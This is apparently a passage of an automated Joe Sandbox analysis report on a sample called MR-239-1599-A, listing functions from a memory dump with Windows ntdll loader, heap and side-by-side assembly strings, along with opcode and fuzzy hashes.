                                                                                                                                                                                                          control_flow_graph 363 1532c0a-1532c0f 364 1532c11-1532c18 363->364 365 1532c1f-1532c26 LdrInitializeThunk 363->365
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                                                                                                                                                                                          • Instruction ID: 950850ffdf38b190c5dfd0f4be7f84e7c196f48cdbb7c6a26ccfb9177d7bf208
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f53288fd163a2ebb683ce401d91993a9f1757272b870896c027f7afa48c8d24
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B09B719019C5D6DA11F7A5460871B7A5077D0715F19C461D2030B41F4778D1D1E275

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 01572349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                                                                          • Opcode ID: 882974b026ba65eed8204ea77ef29e00c5e1ce804414c370fdf9046a918ed953
                                                                                                                                                                                                          • Instruction ID: 6e68320fd983d58e9903f24fc15b2c07c439839ec4e431798d3084df947fc03f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 882974b026ba65eed8204ea77ef29e00c5e1ce804414c370fdf9046a918ed953
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05929D71608342AFE725DF29D882F6BB7E8BB84714F04481DFA94DB250D770E844CB92
                                                                                                                                                                                                          Function 01528620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • 8, xrefs: 015652E3
                                                                                                                                                                                                          • Critical section address., xrefs: 01565502
                                                                                                                                                                                                          • Thread identifier, xrefs: 0156553A
                                                                                                                                                                                                          • Address of the debug info found in the active list., xrefs: 015654AE, 015654FA
                                                                                                                                                                                                          • corrupted critical section, xrefs: 015654C2
                                                                                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654E2
                                                                                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0156540A, 01565496, 01565519
                                                                                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 015654B6
                                                                                                                                                                                                          • double initialized or corrupted critical section, xrefs: 01565508
                                                                                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654CE
                                                                                                                                                                                                          • Critical section address, xrefs: 01565425, 015654BC, 01565534
                                                                                                                                                                                                          • Critical section debug info address, xrefs: 0156541F, 0156552E
                                                                                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01565543
                                                                                                                                                                                                          • undeleted critical section in freed memory, xrefs: 0156542B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                                                                                          • Opcode ID: a166b5d62e7c3c4e4e89bb480633bf90918acb5c847abafa6aae90941448e3e4
                                                                                                                                                                                                          • Instruction ID: d8fc6dfed7153839cf9e367cad1b0fb1a988e5123448c9d367801049530637d8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a166b5d62e7c3c4e4e89bb480633bf90918acb5c847abafa6aae90941448e3e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20817E71A40359AFDF20CF9AC845FAEBBF9BB58714F20411AF504BB250E771A945CB90
                                                                                                                                                                                                          Function 015229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015622E4
                                                                                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01562412
                                                                                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0156261F
                                                                                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015624C0
                                                                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01562624
                                                                                                                                                                                                          • @, xrefs: 0156259B
                                                                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01562506
                                                                                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01562602
                                                                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015625EB
                                                                                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01562498
                                                                                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01562409
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                                                                                          • Opcode ID: 691d3394aee3b7c2d8e204f7fd5a22870b9224d5fd5133203ac16017acc419b8
                                                                                                                                                                                                          • Instruction ID: eaf25451d330099ff27a936830b6851a4c3eda6c3aa8ff9c5f8ad2dcccf381a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 691d3394aee3b7c2d8e204f7fd5a22870b9224d5fd5133203ac16017acc419b8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D0251B6D002299BDB31DB54CC80B9DB7B8BB55314F4045DAE649BB281DB309E84CF99
                                                                                                                                                                                                          Function 01598B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                                                                                          • Opcode ID: bc7c4fc08bf797095c8b3d5a7c2a5f9b2430b27de1502132739685ef460cb548
                                                                                                                                                                                                          • Instruction ID: 5b6c6271b03a60ac60861e65f2dd9f00a44438fdbf0c24300fccc5ab4801970e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc7c4fc08bf797095c8b3d5a7c2a5f9b2430b27de1502132739685ef460cb548
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0851017150434A9BDB29CF18C944BABBBE8FFD6640F14491EEA58CB250E770D504CBA3
                                                                                                                                                                                                          Function 015A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                          • API String ID: 0-1700792311
                                                                                                                                                                                                          • Opcode ID: ec16c06ee6e6e95e109701b2af4926f09dff8cd04733fa54b1981c974936cbc3
                                                                                                                                                                                                          • Instruction ID: 5fe7eb7d5c2ca3ddc3b64df624d99d12db0a53eb986e05395f78578342497f8b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec16c06ee6e6e95e109701b2af4926f09dff8cd04733fa54b1981c974936cbc3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29D1ED35A90286DFDB26DF69C444AADBBF1FF5A704F58804EE4859F2A2C734E841CB50
                                                                                                                                                                                                          Function 015789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • VerifierDebug, xrefs: 01578CA5
                                                                                                                                                                                                          • VerifierFlags, xrefs: 01578C50
                                                                                                                                                                                                          • VerifierDlls, xrefs: 01578CBD
                                                                                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01578A67
                                                                                                                                                                                                          • HandleTraces, xrefs: 01578C8F
                                                                                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01578B8F
                                                                                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01578A3D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                                                                                          • Opcode ID: b9836f2d7871bd2704618d90d77f29663c270a6079c27076c205c1e4f77e70b0
                                                                                                                                                                                                          • Instruction ID: fbd67f53004503f22e648f7bb69b4cb955e023ac42a8abe4f9ab5602af7d81e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9836f2d7871bd2704618d90d77f29663c270a6079c27076c205c1e4f77e70b0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC914872A00712DFD726DF68E88AF1A7BE8BB94724F45095DFA446F250D7709C04CBA1
                                                                                                                                                                                                          Function 014FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                          • API String ID: 0-1109411897
                                                                                                                                                                                                          • Opcode ID: f5d64e0444c486dabbaa87d83e47337781edda8ae9dd0e412d8b5c018e9b119a
                                                                                                                                                                                                          • Instruction ID: 9b3de9564734f855619fad138bd957d60b651492a95635dd9657c484b6329d91
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5d64e0444c486dabbaa87d83e47337781edda8ae9dd0e412d8b5c018e9b119a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56A23B75A0562A8FDB64CF19C9987ADBBB5BF45304F1442DAD909AB360EB309EC5CF00
                                                                                                                                                                                                          Function 015263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                                                                                          • Opcode ID: 67580253896e24c98f7fe8a73a9c2993008e418acbfcefabc549ec04b5b51908
                                                                                                                                                                                                          • Instruction ID: 3b91a884c70be5615763e3a5291d88e977f53317edeb785d2662dceb585fce57
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67580253896e24c98f7fe8a73a9c2993008e418acbfcefabc549ec04b5b51908
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5910131F002269BEB39DF58D889BAE7BE5BB91B24F210129E9506F2D1D7B09841C7D1
                                                                                                                                                                                                          Function 014E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015499ED
                                                                                                                                                                                                          • apphelp.dll, xrefs: 014E6496
                                                                                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01549A2A
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01549A11, 01549A3A
                                                                                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01549A01
                                                                                                                                                                                                          • LdrpInitShimEngine, xrefs: 015499F4, 01549A07, 01549A30
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-204845295
                                                                                                                                                                                                          • Opcode ID: bf994f13241f607c5f1c5a49182456a0dbeccb5d84a49047ff2acd05daba1dce
                                                                                                                                                                                                          • Instruction ID: 7e4e98eb65e22e85823c87876d70cb8f9608ebdfb9aa3fcbad8a7899f5002913
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf994f13241f607c5f1c5a49182456a0dbeccb5d84a49047ff2acd05daba1dce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75511F712083019FEB24DF25D846FAB77E8FB98648F01091EF5959F2A0D7B0E904CB92
                                                                                                                                                                                                          Function 01522674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01562178
                                                                                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01562160, 0156219A, 015621BA
                                                                                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0156219F
                                                                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01562180
                                                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015621BF
                                                                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01562165
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                          • API String ID: 0-861424205
                                                                                                                                                                                                          • Opcode ID: 41fb48b649f36f91646df1fa511d36a1732d0379db5a5a38bf5ee4044fef2b48
                                                                                                                                                                                                          • Instruction ID: 61c75a924a274c65296cfdad8e6300e38f896dd8f791ee6442ca3c179a0dd434
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41fb48b649f36f91646df1fa511d36a1732d0379db5a5a38bf5ee4044fef2b48
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831093BF44235B7FB21CA998C45F5E7A68FB96A55F09005AFA04BF151D3709A00C6E1
                                                                                                                                                                                                          Function 0152C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01568177, 015681EB
                                                                                                                                                                                                          • LdrpInitializeProcess, xrefs: 0152C6C4
                                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01568181, 015681F5
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0152C6C3
                                                                                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 015681E5
                                                                                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01568170
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                          • API String ID: 0-475462383
                                                                                                                                                                                                          • Opcode ID: 0fe3dfc56949216069884e1403aea6ee8cff30ab6d5562482e94462c5f6945e1
                                                                                                                                                                                                          • Instruction ID: 72ebe5050261824a797f0743c8e7536d44833b7f17a05385c31863283130547f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fe3dfc56949216069884e1403aea6ee8cff30ab6d5562482e94462c5f6945e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8831E0B26443179BD224EF28D946E1EBBD4FFD5B10F010958F984AF2A1E670ED04C7A2
                                                                                                                                                                                                          Function 0153096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 01532DF0: LdrInitializeThunk.NTDLL ref: 01532DFA
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BA3
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BB6
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D60
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D74
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1404860816-0
                                                                                                                                                                                                          • Opcode ID: b3287a3d41d42e40823907ccc257e9c0aeec62e340528e48eb76ec8a229a04a6
                                                                                                                                                                                                          • Instruction ID: 174b105e1c772a6cfd7c21d39d0cda6b35a2b50ef4082a5a8f6f4fa3702b29b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3287a3d41d42e40823907ccc257e9c0aeec62e340528e48eb76ec8a229a04a6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2424C75900716DFDB21CF68C880BAAB7F9BF84314F1445A9E989DF241D770AA85CFA0
                                                                                                                                                                                                          Function 014FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                                                                                          • Opcode ID: fa89f6715ac1c90e4ec999e769fc609dbbfc077ad11df5203ed64bb8fa888eda
                                                                                                                                                                                                          • Instruction ID: b2db672f9fb0840c91c01cbd3e0f2624dbac64e5a210b11e09d27ca61876eb2d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa89f6715ac1c90e4ec999e769fc609dbbfc077ad11df5203ed64bb8fa888eda
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DC17974108382CFD711CF58C144B6AB7E4BF84704F14896EFA9A8B3A1E734D94ACB66
                                                                                                                                                                                                          Function 01528402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrpInitializeProcess, xrefs: 01528422
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01528421
                                                                                                                                                                                                          • @, xrefs: 01528591
                                                                                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0152855E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                                                                                          • Opcode ID: 440e3fca378cc1ed663d2ba061ffb56bb1ff77299981b39ba3970e729a0f8871
                                                                                                                                                                                                          • Instruction ID: 977133fe82bb6ede54b7f38ef01b7d709c5ff131cb4493c4494f04aa072c1be1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 440e3fca378cc1ed663d2ba061ffb56bb1ff77299981b39ba3970e729a0f8871
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1919072658356AFD721DEA5C850E6FBBECBF85784F40092EF6849B191E330D904CB62
                                                                                                                                                                                                          Function 0152273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015621D9, 015622B1
                                                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015622B6
                                                                                                                                                                                                          • .Local, xrefs: 015228D8
                                                                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 015621DE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
